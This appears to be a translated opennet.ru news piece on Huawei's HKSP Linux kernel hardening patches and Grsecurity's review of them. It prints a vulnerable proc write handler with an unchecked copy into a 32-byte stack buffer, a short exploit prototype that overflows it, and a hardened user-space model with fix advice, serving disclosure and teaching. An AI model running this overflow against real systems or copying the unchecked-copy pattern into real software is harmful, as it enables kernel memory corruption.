Developers of the Grsecurity project
The HKSP patches were published by a Huawei employee, mention Huawei in the author's GitHub profile, and carry the word Huawei in the project name (HKSP, Huawei Kernel Self Protection). At the same time, Huawei representatives denied any connection between the HKSP project and the company, stating that the code was developed on the employee's personal initiative, is not an official Huawei project and is not used in the company's products. On
HKSP includes changes such as randomization of offsets in the cred structure, protection against attacks on the process ID namespace (pid namespace), separation of the process stack from the mmap area, detection of double kfree() calls, blocking of information leaks through the /proc pseudo-filesystem (/proc/{modules,keys,key-users}, /proc/sys/kernel/*, /proc/sys/vm/mmap_min_addr and /proc/kallsyms), improved user-space address randomization, additional ptrace restrictions, enhanced SMAP and SMEP protection, an option to forbid sending data over raw sockets, blocking of invalid addresses in UDP sockets, and integrity checking of running processes. It also includes the Ksguard kernel module, which is aimed at detecting typical rootkit installation attempts.
A review of the patches by the Grsecurity developers revealed many errors and weaknesses in the code, and also showed the absence of a threat model against which the project's claimed protections could be judged. To demonstrate that the code was written without secure programming practices, they give a trivial vulnerability in the write handler of the file /proc/ksguard/state as an example. The file is created with mode 0777, so every user on the system has write access to it. The ksg_state_write function, which parses commands written to /proc/ksguard/state, copies the written data into a 32-byte stack buffer tmp[32] using the length supplied by the caller, neither comparing it with the size of the destination buffer nor validating the len parameter. In other words, to overwrite part of the kernel stack an attacker only needs to write a sufficiently long string to /proc/ksguard/state.
static ssize_t ksg_state_write(struct file *file, const char __user *buf,
                               size_t len, loff_t *offset)
{
    u64 value;
    char tmp[32];
    size_t n = 0;

    /* len is caller-controlled and is never compared with sizeof(tmp):
     * len > 32 overwrites the kernel stack, and tmp is never
     * NUL-terminated, so the parser below reads past the copied bytes.
     * The error path also returns -1 instead of -EFAULT. */
    if (copy_from_user(tmp, buf, len))
        return -1;
    value = simple_strtoul(tmp, '\0', 10);
    ...
Exploit prototype:

#include <fcntl.h>
#include <unistd.h>

/* 4096 bytes is far more than the 32-byte tmp[] in the handler. */
char buf[4096] = { };
int fd = open("/proc/ksguard/state", O_WRONLY);
if (fd >= 0) {
    write(fd, buf, sizeof(buf));
    close(fd);
}
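To show what the handler should have looked like, here is a user-space model of the write path placed next to a hardened variant. This is an added example written for this page; it is not HKSP code and not the fix Grsecurity proposed. copy_from_user() is replaced by a plain memcpy() wrapper, simple_strtoul() by strtoull(), and the function names ksg_state_write_vuln, ksg_state_write_safe and model_copy_from_user are assumed for the model. The hardened version bounds the copy by the destination size, NUL-terminates before parsing, and rejects input that is not a single number, which is roughly the contract kstrtoull() enforces in the kernel.

```c
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>

#define KSG_BUF_SIZE 32

/* Stand-in for the kernel's copy_from_user(): in this model the "user"
 * buffer is ordinary memory. Returns nonzero on failure like the kernel API. */
static int model_copy_from_user(void *to, const void *from, size_t n)
{
    if (from == NULL)
        return 1;
    memcpy(to, from, n);
    return 0;
}

/* 1. The handler as shipped (behaviour preserved, kernel helpers swapped).
 *    len comes from the caller and is never checked against sizeof(tmp):
 *    len > 32 overwrites the stack, and for len <= 32 tmp is left
 *    unterminated, so the parser reads whatever follows it on the stack.
 *    Call it only with a short, NUL-terminated input. */
static ssize_t ksg_state_write_vuln(const char *buf, size_t len, uint64_t *value)
{
    char tmp[KSG_BUF_SIZE];

    if (model_copy_from_user(tmp, buf, len))
        return -1;                       /* not even a real errno */
    *value = strtoull(tmp, NULL, 10);    /* simple_strtoul() in the original */
    return (ssize_t)len;
}

/* 2. Hardened variant: reject oversized writes before touching the stack,
 *    NUL-terminate, strip one trailing newline (echo adds it), and require the
 *    whole remaining input to be an unsigned decimal number. Errors are
 *    negative errno values, as a write handler is expected to return. */
static ssize_t ksg_state_write_safe(const char *buf, size_t len, uint64_t *value)
{
    char tmp[KSG_BUF_SIZE];
    char *end;

    if (len == 0 || len >= sizeof(tmp))
        return -EINVAL;                  /* leaves room for the terminator */
    if (model_copy_from_user(tmp, buf, len))
        return -EFAULT;
    tmp[len] = '\0';
    if (tmp[len - 1] == '\n')
        tmp[len - 1] = '\0';
    if (tmp[0] < '0' || tmp[0] > '9')
        return -EINVAL;                  /* no sign, no whitespace, no empty */

    errno = 0;
    *value = strtoull(tmp, &end, 10);
    if (*end != '\0' || errno == ERANGE)
        return -EINVAL;                  /* trailing garbage or overflow */
    return (ssize_t)len;
}

int main(void)
{
    uint64_t v = 0;
    char big[4096];                      /* constructed, mirrors the exploit */

    memset(big, '1', sizeof(big));
    printf("safe(\"4096\\n\") -> %zd, value %llu\n",
           ksg_state_write_safe("4096\n", 5, &v), (unsigned long long)v);
    printf("safe(4096 bytes)  -> %zd (expect %d)\n",
           ksg_state_write_safe(big, sizeof(big), &v), -EINVAL);
    printf("vuln(\"42\")       -> %zd, value %llu\n",
           ksg_state_write_vuln("42", 3, &v), (unsigned long long)v);
    return 0;
}
```

The length check belongs before copy_from_user(), not after: once the copy has run with an unchecked len the stack is already corrupted. The second half of the fix is outside the handler: the proc entry must be created with a restrictive mode (0200 or 0600, root-writable only) instead of 0777, otherwise the parser is exposed to every local user even when it is correct.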
Source: opennet.ru